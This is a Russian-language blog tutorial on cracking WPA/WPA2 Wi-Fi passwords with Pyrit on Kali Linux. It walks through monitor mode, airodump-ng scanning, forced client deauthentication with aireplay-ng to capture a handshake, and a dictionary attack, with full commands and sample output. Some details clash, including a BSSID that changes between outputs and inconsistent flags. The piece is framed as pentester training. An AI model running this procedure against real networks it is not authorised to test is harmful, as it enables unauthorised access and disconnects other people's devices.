Pyrit — это инструмент для атак на беспроводные сети, а именно для взлома паролей Wi-Fi. В статье покажу, как используя Pyrit на Kali Linux взломать пароль Wi-Fi.
Еще по теме: Актуальные техники взлома WiFi
Что такое Pyrit
Pyrit — один из лучших инструментов для взлома беспроводных сетей WPA/WPA2. Для взлома паролей WPA/WPA2 он использует потенциал работы многоядерных процессоров и, при необходимости, графических карт. Оно часто используется в тестирования на проникновение и оценки безопасности сетей.
Установка Pyrit на Kali Linux
Чтобы установить Pyrit на Kali Linux, выполните следующие команды в терминале.
1 2 3 |
git clone https://github.com/hacker3983/pyrit-installer cd pyrit-installer sudo bash install.sh |
После завершения установки выполните команду:
1 |
pyrit -h |
Это отобразит справку и позволит убедиться, что утилита была установлена в системе.
Беспроводная карта в режиме монитора
Режим монитора — это режим, в котором карта может прослушивать все передаваемые по сети пакеты (см. Как перевести адаптер в режим монитора WiFi). Прослушивая пакеты, можно в дальнейшем перехватить четырехстороннее рукопожатие WPA/WPA2. Чтобы перевести беспроводную карту в режим монитора, откройте терминал и выполните команду:
1 |
airmon-ng start wlan0 |
Я буду считать, что имя вашего беспроводного интерфейса — wlan0, но если оно отличается, не забудьте указать соответствующее имя. Для определения имени интерфейса можно воспользоваться командой «iwconfig».
Захват рукопожатия WPA / WPA2
Когда клиент аутентифицируется с точкой доступа, он проходит процесс аутентификации. Если перехватить 4-стороннее рукопожатие (Хендшейк), то можно попытаться взломать его и узнать пароль.
Статья для обучения пентестеров (этичных хакеров). При пентесте необходимо действовать этично и придерживаться установленных правил. При написании статьи использовалась личная WiFi-сеть автора. Несанкционированный взлом — уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Чтобы перехватить рукопожатие, необходимо выполнить сканирование доступных WiFi-сетей и выбрать цель. Сделать это можно с помощью следующей команды.
1 |
airodump-ng wlan0mon |
1 2 3 4 5 6 7 8 9 10 |
CH 6][ BAT: 4 hours 9 mins ][ Elapsed: 8 s ][ 2023-11-20 11:10 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys F4:F2:6D:E7:BA:02 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet 28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK 28:EF:01:35:39:87 -42 17 0 0 11 54e WPA2 CCMP PSK Orange-Net BSSID STATION PWR Rate Lost Packets Probes F4:F2:6D:E7:BA:02 28:EF:01:23:46:68 -57 0 - 1 0 1 |
Команда airodump отобразит таблицу данных для всех сетей Wi-Fi в радиусе действия.
Следующий шаг — захват целевой сети. Для этого необходимо знать BSSID и канал целевой беспроводной сети. Откройте еще один терминал и выполните команду:
1 |
airodump-ng --bssid F4:F2:6D:E7:BA:02 -c 6 --write wpa-01 wlan0mon |
Где:
- -c 6 — выбор канала беспроводной сети.
- -bssid F4:F2:6D:E7:BA:02 — выбор MAC-адреса сети.
- -write wpa-01 — выбор имени файла, в который записываются данные.
- wlan0mon — имя интерфейса в режиме монитора.
Деаутентификация клиента
Для того чтобы перехватить хендшейк, необходимо, чтобы клиент прошел аутентификацию с точкой доступа.
Если клиент уже аутентифицирован, его можно деаутентифицировать (отключить от сети), после чего он автоматически пройдет повторную аутентификацию, и вы сможете перехватить 4-стороннее рукопожатие. Откройте еще один терминал и выполните команду:
1 |
aireplay-ng -0 100 -a F4:F2:6D:E7:BA:02 -c 28:EF:01:23:46:68 wlan0mon |
Где:
- -0 — включает деаутентификацию.
- 100 — количество пакетов посылаемых для деаутентификации.
- -a F4:F2:6D:E7:BA:02 — выбор MAC-адреса точки доступа.
- -c 28:EF:01:23:46:68 — выбор MAC-адреса деаутентифицируемого клиента.
1 2 3 4 5 6 7 |
CH 6][ Elapsed: 4 s ][ 2023-11-20 17:51 ][ WPA handshake: F4:F2:6D:E7:BA:02 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet BSSID STATION PWR Lost Packets Probes F4:F2:6D:E7:BA:02 28:EF:01:23:46:68 -57 0 - 1 0 1 |
Выше можете увидеть «WPA handshake: «F4:F2:6D:E7:BA:02» в правом верхнем углу. Это означает, что инструмент airodump-ng успешно перехватил 4-стороннее рукопожатие.
После захвата рукопожатия можно его проверить с помощью Pyrit, используя команду
1 |
pyrit -r pathtocapturefile analyze |
В моем случае команда и результат выглядит следующим образом:
1 |
~$ pyrit -r '/root/Desktop/wpa-01.cap' analyze |
1 2 3 4 5 6 7 8 9 10 11 12 13 |
Pyrit 0.5.1 (C) Lukas Lueg - 2015 John Mora https://github.com/JPaulMora/Pyrit This code is distributed under the GNU General Public License v3+ Parsing file '/root/Desktop/wpa-01.cap' (1/1)... Parsed 122 packets (122 802.11-packets) AccessPoint F4:F2:6D:E7:BA:02 ('SkyNet'): #1: Station 28:EF:01:23:46:68, 4 handshake(s): #1: HMAC_SHA1_AES, good, spread 1 #2: HMAC_SHA1_AES, good, spread 1 #3: HMAC_SHA1_AES, good, spread 87 #4: HMAC_SHA1_AES, good, spread 87 |
Здесь видно, что я смог перехватить хороший хендшейк, а значит, можно приступать к его взлому.
Использование Pyrit для взлома пароля Wi-Fi
Теперь попытайтесь взломать пароль сети, открыв другой терминал и выполнив команду:
1 |
pyrit -r wpa-01.cap -I Wordlst.txt attack_passthrough |
Где:
- -i Wordlst.txt — словарь словарь (укажите полный путь, если файл расположен не в той же директории).
- wpa-01.cap — файл, содержащий перехваченные пакеты.
Как видите пароль был найден и это «ultraconnect».
Помните, что ключевая фраза должна содержаться в файле словаря, который вы используете для взлома WPA/WPA2. Если ее нет в словаре, то Pyrit не сможет определить ключ. В качестве старта рекомендую использоватрь самый популярный словарь — Rockyou.
.Аналог и альтернатива Pyrit
Hashcat — это один из лучших инструментов для взлома паролей, который поддерживает различные алгоритмы хеширования, включая те, которые используются в беспроводных сетях. Hashcat широко используется для взлома паролей методом брутфорс и атак по словарю. Про использование Hashcat мы рассказывали в статьях «Как пользоваться Hashcat на Windows» и «Взлом WiFi с помощью Hashcat на Kali Linux». Также рекомендую использовать специализированные словари для Hashcat.
ПОЛЕЗНЫЕ ССЫЛКИ: